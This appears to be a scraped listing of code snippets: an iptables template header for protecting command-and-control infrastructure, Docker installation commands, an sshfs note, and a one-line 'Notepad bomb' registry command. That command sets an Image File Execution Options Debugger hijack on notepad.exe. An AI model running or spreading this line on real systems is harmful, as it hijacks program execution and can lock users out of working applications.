References:

This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Basic IPTABLES Template Script | |
# Author: Joe Vest, Andrew Chiles | |
# NOTES: | |
# Description: | |
# Template script to protect C2 infrastructure | |
# Parameter Reference: | |
# TARGET_RANGE1 - IPs allowed only to ALLOWED_PORTS | |
# ALLOWED_PORTS - port allowed from the TARGET_RANGE1 | |
# TEAM_RANGE1 - IPs allowed to connect to all ports |
Reference: https://www.digitalocean.com/community/tutorials/how-to-install-docker-compose-on-ubuntu-16-04
sudo curl -L https://github.com/docker/compose/releases/download/1.18.0/docker-compose-`uname -s`-`uname -m` -o /usr/local/bin/docker-compose
sudo chmod +x /usr/local/bin/docker-compose
Reference: https://www.digitalocean.com/community/tutorials/how-to-install-docker-compose-on-ubuntu-16-04
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
Image File Execution Options - DOS
Notepad bomb
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /t REG_SZ /v Debugger /d "cmd.exe /c echo Come at me bro... && start C:\windows\notepad.exe&" /f
Explorer Bomb
sshfs is a filesystem based on the SSH file transfer protocol. It can be very useful to stand up an ADHOC file repository.
OlderNewer